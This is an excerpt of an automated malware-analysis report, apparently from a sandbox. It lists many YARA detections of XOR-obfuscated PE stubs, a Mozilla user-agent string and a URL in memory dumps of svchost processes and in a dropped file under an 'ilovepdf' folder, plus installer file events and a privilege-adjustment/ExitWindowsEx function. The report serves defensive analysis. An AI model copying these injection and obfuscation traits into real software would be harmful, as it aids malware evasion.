Source: 38.2.svchost.exe.25c96c80000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.2.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 34.2.svchost.exe.202b28f0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 30.0.svchost.exe.1be5cd40000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.2.svchost.exe.24b7d0d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.0.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.2.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.0.svchost.exe.222cab20000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.0.svchost.exe.233426d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 31.0.svchost.exe.21c23140000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.0.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.2.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.2.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.0.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.2.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 17.0.svchost.exe.204f3380000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 22.2.svchost.exe.222cab20000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 29.0.svchost.exe.22f12740000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.2.svchost.exe.2f2c5c00000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 21.2.svchost.exe.2f2c5c00000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 16.2.svchost.exe.12e17870000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 19.2.svchost.exe.233426d0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.0.svchost.exe.1d91aad0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 25.0.svchost.exe.2216b8b0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 38.2.svchost.exe.25c96c80000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 23.0.svchost.exe.28621cd0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 24.2.svchost.exe.1dc51fb0000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 37.0.svchost.exe.1afba170000.0.raw.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 14.0.svchost.exe.24b7d0d0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 20.0.svchost.exe.1d91aad0000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000003.340502864.000001D91AA60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000003.343737038.000002F2C5B90000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000003.383962907.000001BE5C730000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000000.397199381.00000202B28F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000003.379846771.0000022F12180000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000000.402119778.000001AFBA170000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000002.829615785.0000025C96C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000003.363362333.000002216B840000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.814263097.0000012E17674000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000002.815503783.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000000.389374530.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.423845789.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.341269563.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000002.820529720.000001AFBA170000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000002.823826621.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000000.337739160.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000002.813792020.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.423609117.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000D.00000002.415787297.0000000004D00000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000003.327914667.0000024B7D060000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.428213354.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000002.815819484.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000003.337258636.0000023342660000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000000.384736630.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000003.387366099.0000021C22B80000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000D.00000002.415946366.0000000004EB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000002.832381229.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000014.00000000.341208175.000001D91AAD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000002.813715548.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000003.347514859.00000222CAAB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.425960077.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000000.373121190.000002743A320000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000002.815078501.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422182454.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000000.334220088.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001B.00000003.369691335.000002743A2B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000003.351653681.0000028621C60000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.818890783.0000012E17800000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000025.00000003.400991197.000001AFBA100000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000016.00000000.348676580.00000222CAB20000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001F.00000002.812231248.0000021C23140000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000015.00000000.344698282.000002F2C5C00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000002.535149996.00000204F3380000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000000.328311763.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000000.376992650.000001111AC00000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001C.00000003.376362360.000001111A990000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000002.816236528.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000000.360038212.000001DC51FB0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000011.00000003.332207196.00000204F3310000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000002.818183114.00000202B28F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001E.00000002.817922653.000001BE5CD40000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000002.819987063.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000018.00000003.358956520.000001DC51F40000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000022.00000003.395183978.00000202B2880000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.347751954.0000012E17682000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000010.00000002.831136310.0000012E1A230000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000000E.00000002.813201421.0000024B7D0D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000019.00000000.364403941.000002216B8B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000013.00000002.814492712.00000233426D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 0000001D.00000000.380584076.0000022F12740000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000002.822239151.0000012E17870000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422945945.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000017.00000000.353917574.0000028621CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: 00000010.00000003.422081412.0000012E1768F000.00000004.00000001.sdmp, type: MEMORYMatched rule: SUSP_XORed_MSDOS_Stub_Message date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed MSDOS stub message, reference = https://yara.readthedocs.io/en/latest/writingrules.html#xor-strings, score =
Source: C:\Program Files (x86)\ilovepdf\is-93C0J.tmp, type: DROPPEDMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score = , modified = 2021-05-27
Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIFBC3.tmpJump to behavior
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF110 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,10_2_004AF110
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\3cf0a5.msiJump to behavior
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E178BB6B8 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E178BB6A8 appears 40 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E198530B0 appears 33 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000024B7D11B6A8 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 00000204F33CB848 appears 39 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000024B7D11B6B8 appears 32 times
Source: C:\Windows\System32\svchost.exeCode function: String function: 0000012E19856620 appears 53 times
